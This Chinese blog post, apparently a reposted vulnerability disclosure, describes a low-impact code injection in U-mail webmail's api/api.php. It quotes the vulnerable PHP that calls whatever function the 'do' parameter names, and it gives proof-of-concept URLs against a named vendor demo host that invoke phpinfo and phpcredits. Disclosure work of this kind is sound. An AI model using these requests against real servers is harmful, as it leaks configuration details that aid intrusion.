纵有疾风起
人生不言弃

U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成

漏洞文件:api/api.php:670行

 

$do = trim( $_GET['do'] );
if ( function_exists( $do ) )
{
    $do( );
}
else
{
    echo "param_error";
}
exit( );

直接来个动态函数,可惜没有参数可控,只能控制$do,所以可以鸡肋的用来读些敏感信息如phpinfo()/phpcredits()等

官网demo:

 

http://mail.comingchina.com/webmail/api/api.php?do=phpinfo

 

U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成插图

 

http://mail.comingchina.com/webmail/api/api.php?do=phpcredits

 

U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成插图1

 

U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成插图2

 

修复方案:

过滤

    上一篇: 如何轻松防范DEDECMS(织梦)挂马 – 网站安全 – 自学

    下一篇: 某OA系统两处SQL注射到GetShell(含详细修复方案)
未经允许不得转载:起风网 » U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成
分享到: 生成海报

评论 抢沙发

评论前必须登录!

立即登录